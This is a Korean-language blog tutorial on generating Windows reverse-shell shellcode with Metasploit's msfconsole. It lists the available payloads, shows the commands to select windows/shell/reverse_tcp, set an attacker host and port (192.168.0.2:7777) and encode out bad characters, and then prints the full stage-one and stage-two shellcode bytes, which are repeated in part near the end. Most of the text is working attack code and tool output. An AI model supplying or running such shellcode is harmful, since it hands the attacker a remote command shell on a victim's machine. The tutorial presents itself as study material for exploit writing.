sweetchip's blog


안녕하세요.


오랜만의 포스팅입니다. ㅎㅎ


개학하고 또 여러가지로 개인적인 일이 많아서 포스팅을 잘 하지 못했습니다.. ㅠㅠ


2달전 쉘코드에 대해 공부를 하면서 여러가지 정보를 수집했는데,


metasploit을 이용하여 Remote Exploit 이나 Local Exploit을 사용하는 방법은 많지만 상대적으로 Shellcode 작성을 하는 방법의 강좌가 적더군요


이번에는 Metasploit을 이용하여 윈도우의 쉘코드를 구하는 방법을 알아보겠습니다.


최대한 쉽게 설명하겠으나 어쩌면 아주 약간의 버퍼 오버플로우와 메모리 구조에 대한 지식이 필요할 수 있습니다.




사전준비물 : BackTrack5 r3[다른 버전도가능], msfconsole[업데이트 필요], apache서버[없어도 됩니다.]


터미널을 열고 msfconsole 을 입력합니다. [로딩 시간이 1~2분 정도 소요됩니다.]



msfconsole이 모두 실행된 상태입니다.


그리고 show payloads 를 입력합니다.



metasploit에서 생성할수 있는 쉘코드는 다음과 같습니다.


Payloads

======== Name Disclosure Date Rank Description ---- --------------- ---- ----------- aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline aix/ppc/shell_interact normal AIX execve shell for inetd aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline bsd/sparc/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline bsd/sparc/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline bsd/x86/exec normal BSD Execute Command bsd/x86/metsvc_bind_tcp normal FreeBSD Meterpreter Service, Bind TCP bsd/x86/metsvc_reverse_tcp normal FreeBSD Meterpreter Service, Reverse TCP Inline bsd/x86/shell/bind_ipv6_tcp normal BSD Command Shell, Bind TCP Stager (IPv6) bsd/x86/shell/bind_tcp normal BSD Command Shell, Bind TCP Stager bsd/x86/shell/find_tag normal BSD Command Shell, Find Tag Stager bsd/x86/shell/reverse_ipv6_tcp normal BSD Command Shell, Reverse TCP Stager (IPv6) bsd/x86/shell/reverse_tcp normal BSD Command Shell, Reverse TCP Stager bsd/x86/shell_bind_tcp normal BSD Command Shell, Bind TCP Inline bsd/x86/shell_bind_tcp_ipv6 normal BSD Command Shell, Bind TCP Inline (IPv6) bsd/x86/shell_find_port normal BSD Command Shell, Find Port Inline bsd/x86/shell_find_tag normal BSD Command Shell, Find Tag Inline bsd/x86/shell_reverse_tcp normal BSD Command Shell, Reverse TCP Inline bsd/x86/shell_reverse_tcp_ipv6 normal BSD Command Shell, Reverse TCP Inline (IPv6) bsdi/x86/shell/bind_tcp normal BSDi Command Shell, Bind TCP Stager bsdi/x86/shell/reverse_tcp normal BSDi Command Shell, Reverse TCP Stager bsdi/x86/shell_bind_tcp normal BSDi Command Shell, Bind TCP Inline bsdi/x86/shell_find_port normal BSDi Command Shell, Find Port Inline bsdi/x86/shell_reverse_tcp normal BSDi Command Shell, Reverse TCP Inline cmd/unix/bind_inetd normal Unix Command Shell, Bind TCP (inetd) cmd/unix/bind_netcat normal Unix Command Shell, Bind TCP (via netcat -e) cmd/unix/bind_netcat_ipv6 normal Unix Command Shell, Bind TCP (via netcat -e) IPv6 cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via Perl) cmd/unix/bind_perl_ipv6 normal Unix Command Shell, Bind TCP (via perl) IPv6 cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby) cmd/unix/bind_ruby_ipv6 normal Unix Command Shell, Bind TCP (via Ruby) IPv6 cmd/unix/generic normal Unix Command, Generic Command Execution cmd/unix/interact normal Unix Command, Interact with Established Connection cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet) cmd/unix/reverse_bash normal Unix Command Shell, Reverse TCP (/dev/tcp) cmd/unix/reverse_netcat normal Unix Command Shell, Reverse TCP (via netcat -e) cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via Perl) cmd/unix/reverse_python normal Unix Command Shell, Reverse TCP (via Python) cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby) cmd/windows/adduser normal Windows Execute net user /ADD CMD cmd/windows/bind_perl normal Windows Command Shell, Bind TCP (via Perl) cmd/windows/bind_perl_ipv6 normal Windows Command Shell, Bind TCP (via perl) IPv6 cmd/windows/bind_ruby normal Windows Command Shell, Bind TCP (via Ruby) cmd/windows/download_eval_vbs normal Windows Executable Download and Evaluate VBS cmd/windows/download_exec_vbs normal Windows Executable Download and Execute (via .vbs) cmd/windows/reverse_perl normal Windows Command, Double reverse TCP connection (via Perl) cmd/windows/reverse_ruby normal Windows Command Shell, Reverse TCP (via Ruby) generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline linux/armle/adduser normal Linux Add User linux/armle/exec normal Linux Execute Command linux/armle/shell_bind_tcp normal Linux Command Shell, Reverse TCP Inline linux/armle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/mipsbe/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/mipsle/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/ppc/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline linux/ppc/shell_find_port normal Linux Command Shell, Find Port Inline linux/ppc/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/ppc64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline linux/ppc64/shell_find_port normal Linux Command Shell, Find Port Inline linux/ppc64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/x64/exec normal Linux Execute Command linux/x64/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager linux/x64/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager linux/x64/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline linux/x64/shell_find_port normal Linux Command Shell, Find Port Inline linux/x64/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/x86/adduser normal Linux Add User linux/x86/chmod normal Linux Chmod linux/x86/exec normal Linux Execute Command linux/x86/meterpreter/bind_ipv6_tcp normal Linux Meterpreter, Bind TCP Stager (IPv6) linux/x86/meterpreter/bind_nonx_tcp normal Linux Meterpreter, Bind TCP Stager linux/x86/meterpreter/bind_tcp normal Linux Meterpreter, Bind TCP Stager linux/x86/meterpreter/find_tag normal Linux Meterpreter, Find Tag Stager linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Meterpreter, Reverse TCP Stager (IPv6) linux/x86/meterpreter/reverse_nonx_tcp normal Linux Meterpreter, Reverse TCP Stager linux/x86/meterpreter/reverse_tcp normal Linux Meterpreter, Reverse TCP Stager linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline linux/x86/read_file normal Linux Read File linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind TCP Stager (IPv6) linux/x86/shell/bind_nonx_tcp normal Linux Command Shell, Bind TCP Stager linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager linux/x86/shell/find_tag normal Linux Command Shell, Find Tag Stager linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6) linux/x86/shell/reverse_nonx_tcp normal Linux Command Shell, Reverse TCP Stager linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP Stager linux/x86/shell_bind_ipv6_tcp normal Linux Command Shell, Bind TCP Inline (IPv6) linux/x86/shell_bind_tcp normal Linux Command Shell, Bind TCP Inline linux/x86/shell_find_port normal Linux Command Shell, Find Port Inline linux/x86/shell_find_tag normal Linux Command Shell, Find Tag Inline linux/x86/shell_reverse_tcp normal Linux Command Shell, Reverse TCP Inline linux/x86/shell_reverse_tcp2 normal Linux Command Shell, Reverse TCP Inline - Metasm Demo netware/shell/reverse_tcp normal NetWare Command Shell, Reverse TCP Stager osx/armle/execute/bind_tcp normal OS X Write and Execute Binary, Bind TCP Stager osx/armle/execute/reverse_tcp normal OS X Write and Execute Binary, Reverse TCP Stager osx/armle/shell/bind_tcp normal OS X Command Shell, Bind TCP Stager osx/armle/shell/reverse_tcp normal OS X Command Shell, Reverse TCP Stager osx/armle/shell_bind_tcp normal Apple iOS Command Shell, Bind TCP Inline osx/armle/shell_reverse_tcp normal Apple iOS Command Shell, Reverse TCP Inline osx/armle/vibrate normal Apple iOS iPhone Vibrate osx/ppc/shell/bind_tcp normal OS X Command Shell, Bind TCP Stager osx/ppc/shell/find_tag normal OS X Command Shell, Find Tag Stager osx/ppc/shell/reverse_tcp normal OS X Command Shell, Reverse TCP Stager osx/ppc/shell_bind_tcp normal OS X Command Shell, Bind TCP Inline osx/ppc/shell_reverse_tcp normal OS X Command Shell, Reverse TCP Inline osx/x64/dupandexecve/bind_tcp normal OS X dup2 Command Shell, Bind TCP Stager osx/x64/dupandexecve/reverse_tcp normal OS X dup2 Command Shell, Reverse TCP Stager osx/x64/exec normal OS X x64 Execute Command osx/x64/say normal OSX X64 say Shellcode osx/x64/shell_bind_tcp normal OS X x64 Shell Bind TCP osx/x64/shell_find_tag normal OSX Command Shell, Find Tag Inline osx/x64/shell_reverse_tcp normal OS X x64 Shell Reverse TCP osx/x86/bundleinject/bind_tcp normal Mac OS X Inject Mach-O Bundle, Bind TCP Stager osx/x86/bundleinject/reverse_tcp normal Mac OS X Inject Mach-O Bundle, Reverse TCP Stager osx/x86/exec normal OS X Execute Command osx/x86/isight/bind_tcp normal Mac OS X x86 iSight Photo Capture, Bind TCP Stager osx/x86/isight/reverse_tcp normal Mac OS X x86 iSight Photo Capture, Reverse TCP Stager osx/x86/shell_bind_tcp normal OS X Command Shell, Bind TCP Inline osx/x86/shell_find_port normal OS X Command Shell, Find Port Inline osx/x86/shell_reverse_tcp normal OS X Command Shell, Reverse TCP Inline osx/x86/vforkshell/bind_tcp normal OS X (vfork) Command Shell, Bind TCP Stager osx/x86/vforkshell/reverse_tcp normal OS X (vfork) Command Shell, Reverse TCP Stager osx/x86/vforkshell_bind_tcp normal OS X (vfork) Command Shell, Bind TCP Inline osx/x86/vforkshell_reverse_tcp normal OS X (vfork) Command Shell, Reverse TCP Inline php/bind_perl normal PHP Command Shell, Bind TCP (via Perl) php/bind_perl_ipv6 normal PHP Command Shell, Bind TCP (via perl) IPv6 php/bind_php normal PHP Command Shell, Bind TCP (via PHP) php/bind_php_ipv6 normal PHP Command Shell, Bind TCP (via php) IPv6 php/download_exec normal PHP Executable Download and Execute php/exec normal PHP Execute Command php/meterpreter/bind_tcp normal PHP Meterpreter, Bind TCP Stager php/meterpreter/bind_tcp_ipv6 normal PHP Meterpreter, Bind TCP Stager IPv6 php/meterpreter/reverse_tcp normal PHP Meterpreter, PHP Reverse TCP Stager php/meterpreter_reverse_tcp normal PHP Meterpreter, Reverse TCP Inline php/reverse_perl normal PHP Command, Double reverse TCP connection (via Perl) php/reverse_php normal PHP Command Shell, Reverse TCP (via PHP) php/shell_findsock normal PHP Command Shell, Find Sock ruby/bind_tcp normal Ruby Command Shell, Bind TCP ruby/bind_tcp_ipv6 normal Ruby Command Shell, Bind TCP IPv6 ruby/reverse_tcp normal Ruby Command Shell, Reverse TCP solaris/sparc/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline solaris/sparc/shell_find_port normal Solaris Command Shell, Find Port Inline solaris/sparc/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline solaris/x86/shell_bind_tcp normal Solaris Command Shell, Bind TCP Inline solaris/x86/shell_find_port normal Solaris Command Shell, Find Port Inline solaris/x86/shell_reverse_tcp normal Solaris Command Shell, Reverse TCP Inline tty/unix/interact normal Unix TTY, Interact with Established Connection windows/adduser normal Windows Execute net user /ADD windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind TCP Stager (IPv6) windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager (No NX or Win7) windows/dllinject/bind_tcp normal Reflective DLL Injection, Bind TCP Stager windows/dllinject/find_tag normal Reflective DLL Injection, Find Tag Ordinal Stager windows/dllinject/reverse_http normal Reflective DLL Injection, Reverse HTTP Stager windows/dllinject/reverse_ipv6_http normal Reflective DLL Injection, Reverse HTTP Stager (IPv6) windows/dllinject/reverse_ipv6_tcp normal Reflective DLL Injection, Reverse TCP Stager (IPv6) windows/dllinject/reverse_nonx_tcp normal Reflective DLL Injection, Reverse TCP Stager (No NX or Win7) windows/dllinject/reverse_ord_tcp normal Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7) windows/dllinject/reverse_tcp normal Reflective DLL Injection, Reverse TCP Stager windows/dllinject/reverse_tcp_allports normal Reflective DLL Injection, Reverse All-Port TCP Stager windows/dllinject/reverse_tcp_dns normal Reflective DLL Injection, Reverse TCP Stager (DNS) windows/dns_txt_query_exec normal DNS TXT Record Payload Download and Execution windows/download_exec normal Windows Executable Download (http,https,ftp) and Execute windows/exec normal Windows Execute Command windows/loadlibrary normal Windows LoadLibrary Path windows/messagebox normal Windows MessageBox windows/meterpreter/bind_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6) windows/meterpreter/bind_nonx_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/meterpreter/bind_tcp normal Windows Meterpreter (Reflective Injection), Bind TCP Stager windows/meterpreter/find_tag normal Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager windows/meterpreter/reverse_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager windows/meterpreter/reverse_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager windows/meterpreter/reverse_ipv6_http normal Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6) windows/meterpreter/reverse_ipv6_https normal Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6) windows/meterpreter/reverse_ipv6_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6) windows/meterpreter/reverse_nonx_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/meterpreter/reverse_ord_tcp normal Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/meterpreter/reverse_tcp normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager windows/meterpreter/reverse_tcp_allports normal Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager windows/meterpreter/reverse_tcp_dns normal Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS) windows/metsvc_bind_tcp normal Windows Meterpreter Service, Bind TCP windows/metsvc_reverse_tcp normal Windows Meterpreter Service, Reverse TCP Inline windows/patchupdllinject/bind_ipv6_tcp normal Windows Inject DLL, Bind TCP Stager (IPv6) windows/patchupdllinject/bind_nonx_tcp normal Windows Inject DLL, Bind TCP Stager (No NX or Win7) windows/patchupdllinject/bind_tcp normal Windows Inject DLL, Bind TCP Stager windows/patchupdllinject/find_tag normal Windows Inject DLL, Find Tag Ordinal Stager windows/patchupdllinject/reverse_ipv6_tcp normal Windows Inject DLL, Reverse TCP Stager (IPv6) windows/patchupdllinject/reverse_nonx_tcp normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_ord_tcp normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupdllinject/reverse_tcp normal Windows Inject DLL, Reverse TCP Stager windows/patchupdllinject/reverse_tcp_allports normal Windows Inject DLL, Reverse All-Port TCP Stager windows/patchupdllinject/reverse_tcp_dns normal Windows Inject DLL, Reverse TCP Stager (DNS) windows/patchupmeterpreter/bind_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6) windows/patchupmeterpreter/bind_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7) windows/patchupmeterpreter/bind_tcp normal Windows Meterpreter (skape/jt Injection), Bind TCP Stager windows/patchupmeterpreter/find_tag normal Windows Meterpreter (skape/jt Injection), Find Tag Ordinal Stager windows/patchupmeterpreter/reverse_ipv6_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6) windows/patchupmeterpreter/reverse_nonx_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_ord_tcp normal Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/patchupmeterpreter/reverse_tcp normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager windows/patchupmeterpreter/reverse_tcp_allports normal Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager windows/patchupmeterpreter/reverse_tcp_dns normal Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS) windows/shell/bind_ipv6_tcp normal Windows Command Shell, Bind TCP Stager (IPv6) windows/shell/bind_nonx_tcp normal Windows Command Shell, Bind TCP Stager (No NX or Win7) windows/shell/bind_tcp normal Windows Command Shell, Bind TCP Stager windows/shell/find_tag normal Windows Command Shell, Find Tag Ordinal Stager windows/shell/reverse_http normal Windows Command Shell, Reverse HTTP Stager windows/shell/reverse_ipv6_http normal Windows Command Shell, Reverse HTTP Stager (IPv6) windows/shell/reverse_ipv6_tcp normal Windows Command Shell, Reverse TCP Stager (IPv6) windows/shell/reverse_nonx_tcp normal Windows Command Shell, Reverse TCP Stager (No NX or Win7) windows/shell/reverse_ord_tcp normal Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7) windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager windows/shell/reverse_tcp_allports normal Windows Command Shell, Reverse All-Port TCP Stager windows/shell/reverse_tcp_dns normal Windows Command Shell, Reverse TCP Stager (DNS) windows/shell_bind_tcp normal Windows Command Shell, Bind TCP Inline windows/shell_bind_tcp_xpfw normal Windows Disable Windows ICF, Command Shell, Bind TCP Inline windows/shell_reverse_tcp normal Windows Command Shell, Reverse TCP Inline windows/speak_pwned normal Windows Speech API - Say "You Got Pwned!" windows/upexec/bind_ipv6_tcp normal Windows Upload/Execute, Bind TCP Stager (IPv6) windows/upexec/bind_nonx_tcp normal Windows Upload/Execute, Bind TCP Stager (No NX or Win7) windows/upexec/bind_tcp normal Windows Upload/Execute, Bind TCP Stager windows/upexec/find_tag normal Windows Upload/Execute, Find Tag Ordinal Stager windows/upexec/reverse_http normal Windows Upload/Execute, Reverse HTTP Stager windows/upexec/reverse_ipv6_http normal Windows Upload/Execute, Reverse HTTP Stager (IPv6) windows/upexec/reverse_ipv6_tcp normal Windows Upload/Execute, Reverse TCP Stager (IPv6) windows/upexec/reverse_nonx_tcp normal Windows Upload/Execute, Reverse TCP Stager (No NX or Win7) windows/upexec/reverse_ord_tcp normal Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7) windows/upexec/reverse_tcp normal Windows Upload/Execute, Reverse TCP Stager windows/upexec/reverse_tcp_allports normal Windows Upload/Execute, Reverse All-Port TCP Stager windows/upexec/reverse_tcp_dns normal Windows Upload/Execute, Reverse TCP Stager (DNS) windows/vncinject/bind_ipv6_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (IPv6) windows/vncinject/bind_nonx_tcp normal VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7) windows/vncinject/bind_tcp normal VNC Server (Reflective Injection), Bind TCP Stager windows/vncinject/find_tag normal VNC Server (Reflective Injection), Find Tag Ordinal Stager windows/vncinject/reverse_http normal VNC Server (Reflective Injection), Reverse HTTP Stager windows/vncinject/reverse_ipv6_http normal VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6) windows/vncinject/reverse_ipv6_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (IPv6) windows/vncinject/reverse_nonx_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7) windows/vncinject/reverse_ord_tcp normal VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7) windows/vncinject/reverse_tcp normal VNC Server (Reflective Injection), Reverse TCP Stager windows/vncinject/reverse_tcp_allports normal VNC Server (Reflective Injection), Reverse All-Port TCP Stager windows/vncinject/reverse_tcp_dns normal VNC Server (Reflective Injection), Reverse TCP Stager (DNS) windows/x64/exec normal Windows x64 Execute Command windows/x64/loadlibrary normal Windows x64 LoadLibrary Path windows/x64/meterpreter/bind_tcp normal Windows x64 Meterpreter, Windows x64 Bind TCP Stager windows/x64/meterpreter/reverse_tcp normal Windows x64 Meterpreter, Windows x64 Reverse TCP Stager windows/x64/shell/bind_tcp normal Windows x64 Command Shell, Windows x64 Bind TCP Stager windows/x64/shell/reverse_tcp normal Windows x64 Command Shell, Windows x64 Reverse TCP Stager windows/x64/shell_bind_tcp normal Windows x64 Command Shell, Bind TCP Inline windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager


저는 이중에서 windows/shell/reverse_tcp 의 쉘코드를 생성해 보도록 하겠습니다.


windows/shell/reverse_tcp normal Windows Command Shell, Reverse TCP Stager


victim -> hacker 로 연결하도록 하는 쉘코드입니다.


연결시엔 hacker는 시스템의 최고의 권한을 얻게됩니다.


use windows/shell/reverse_tcp 를입력합니다.





또 만약 자신이 cmd를 실행하는 쉘코드를 만들고 싶다면 다음과 같이 입력합니다


use windows/exec


이처럼 원하는 쉘코드를 위에서 선택하시면 됩니다.


쉘코드에 따른 설명은 오른쪽에 나와있는걸 보실 수 있습니다.



그러면 reverse_tcp 페이로드로 설정이되는데요.


페이로드의 옵션을 보려면 show options 를 입력합니다.


옵션은 연결할ip와 port, 그리고 exitfunc[특별한경우에 필요]가 있습니다.


이 페이로드를 사용하기 위해선 위 옵션을 채워야 합니다.



이제 그러면 옵션을 채워보겠습니다.


옵션을 설정하는 방법은 set [name] [value] 입니다.


위 사진에 Required 만 채우시면 되겠습니다.


exitfunc는 이미 설정되어있으니 패스하고, lhost와 lport를 채워보겠습니다.


host는 연결할 서버의 ip, 그리고 port는 연결할 서버의 port를 입력합니다.


ip설정

set lhost 192.168.0.2


port 설정

set lport 7777



세팅을 끝내고 바로 생성을 합니다.


generate -b '\xff\x00'


-b 옵션은 쉘코드에서 저 값을 나오지 않도록 인코딩을 거치는 것입니다.


취약점을 이용하여 exploit을 작성할시 \xff 나 \x00 등 문자때문에 payload 가 손상되는일이 간혹 있습니다.


저런 문자들을 bad char 이라고 합니다.


그런 bad char이 나오지 않도록 거치는 것이 -b 옵션입니다.


그렇다면 이제 모두 생성이 되었습니다.


생성된 값은 다음과 같습니다.


# windows/shell/reverse_tcp - 317 bytes (stage 1) # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # VERBOSE=false, LHOST=192.168.0.2, LPORT=7777, # ReverseConnectRetries=5, ReverseAllowProxy=false, # EXITFUNC=process, InitialAutoRunScript=, AutoRunScript= buf = "\xba\x6d\x92\x9b\x46\xdb\xd2\xd9\x74\x24\xf4\x58\x33\xc9" "\xb1\x49\x31\x50\x14\x83\xe8\xfc\x03\x50\x10\x8f\x67\x67" "\xae\xc6\x88\x98\x2f\xb8\x01\x7d\x1e\xea\x76\xf5\x33\x3a" "\xfc\x5b\xb8\xb1\x50\x48\x4b\xb7\x7c\x7f\xfc\x7d\x5b\x4e" "\xfd\xb0\x63\x1c\x3d\xd3\x1f\x5f\x12\x33\x21\x90\x67\x32" "\x66\xcd\x88\x66\x3f\x99\x3b\x96\x34\xdf\x87\x97\x9a\x6b" "\xb7\xef\x9f\xac\x4c\x45\xa1\xfc\xfd\xd2\xe9\xe4\x76\xbc" "\xc9\x15\x5a\xdf\x36\x5f\xd7\x2b\xcc\x5e\x31\x62\x2d\x51" "\x7d\x28\x10\x5d\x70\x31\x54\x5a\x6b\x44\xae\x98\x16\x5e" "\x75\xe2\xcc\xeb\x68\x44\x86\x4b\x49\x74\x4b\x0d\x1a\x7a" "\x20\x5a\x44\x9f\xb7\x8f\xfe\x9b\x3c\x2e\xd1\x2d\x06\x14" "\xf5\x76\xdc\x35\xac\xd2\xb3\x4a\xae\xbb\x6c\xee\xa4\x2e" "\x78\x88\xe6\x26\x4d\xa6\x18\xb7\xd9\xb1\x6b\x85\x46\x69" "\xe4\xa5\x0f\xb7\xf3\xca\x25\x0f\x6b\x35\xc6\x6f\xa5\xf2" "\x92\x3f\xdd\xd3\x9a\xd4\x1d\xdb\x4e\x7a\x4e\x73\x21\x3a" "\x3e\x33\x91\xd2\x54\xbc\xce\xc2\x56\x16\x67\x68\xac\xf1" "\x48\xc4\xae\x03\x21\x16\xaf\x1d\xd0\x9f\x49\x4b\x02\xc9" "\xc2\xe4\xbb\x50\x98\x95\x44\x4f\xe4\x96\xcf\x63\x18\x58" "\x38\x0e\x0a\x0d\xc8\x45\x70\x98\xd7\x70\x1f\x25\x42\x7e" "\xb6\x72\xfa\x7c\xef\xb5\xa5\x7f\xda\xcd\x6c\x15\xa5\xb9" "\x90\xf9\x25\x3a\xc7\x93\x25\x52\xbf\xc7\x75\x47\xc0\xd2" "\xe9\xd4\x55\xdc\x5b\x88\xfe\xb4\x61\xf7\xc9\x1b\x99\xd2" "\xcb\x60\x4c\x1b\x4e\x90\xfa\x4f\x92" # windows/shell/reverse_tcp - 240 bytes (stage 2) # http://www.metasploit.com buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52" "\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" "\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d" "\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0" "\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" "\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff" "\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d" "\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" "\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44" "\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" "\x12\xeb\x86\x5d\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01" "\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46" "\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89" "\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb" "\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c" "\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53" "\xff\xd5"



자.. 모두 생성이 되었습니다.




아래는 선택사항이지만 하시는것을 추천합니다.


저는 현재 vm으로 돌리고 있어서 파일 옮기기가 가능하나 일부로 아파치 서버를 이용합니다.


웹으로 되어있어서 백트랙 아파치 서버에 접속만 하면 간단하게 복사가 가능하기 떄문이죠~


apache2 서버를 켜는법


상단탭의 Applications -> BackTrack -> Services -> HTTPD -> apache start 를 누르시면 apache2 서버가 구동됩니다.


apache2 서버의 폴더는 /var/www 입니다.


/var/www 로 이동합니다.



그리고 gedit으로 shellcode.txt를 실행합니다.



만들어진 쉘코드를 복사하고 붙여넣고 저장합니다.



그리고 서버로 접속하면 shellcode.txt가 보입니다.



다시한번 써보게 되지만, 위에서 복사한값은 다음과 같습니다.


msf payload(reverse_tcp) > generate -b '\xff\x00'

# windows/shell/reverse_tcp - 317 bytes (stage 1)
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LHOST=192.168.0.2, LPORT=7777, 
# ReverseConnectRetries=5, ReverseAllowProxy=false, 
# EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
buf = 
"\xba\x6d\x92\x9b\x46\xdb\xd2\xd9\x74\x24\xf4\x58\x33\xc9"  
"\xb1\x49\x31\x50\x14\x83\xe8\xfc\x03\x50\x10\x8f\x67\x67"  
"\xae\xc6\x88\x98\x2f\xb8\x01\x7d\x1e\xea\x76\xf5\x33\x3a"  
"\xfc\x5b\xb8\xb1\x50\x48\x4b\xb7\x7c\x7f\xfc\x7d\x5b\x4e"  
"\xfd\xb0\x63\x1c\x3d\xd3\x1f\x5f\x12\x33\x21\x90\x67\x32"  
"\x66\xcd\x88\x66\x3f\x99\x3b\x96\x34\xdf\x87\x97\x9a\x6b"  
"\xb7\xef\x9f\xac\x4c\x45\xa1\xfc\xfd\xd2\xe9\xe4\x76\xbc"  
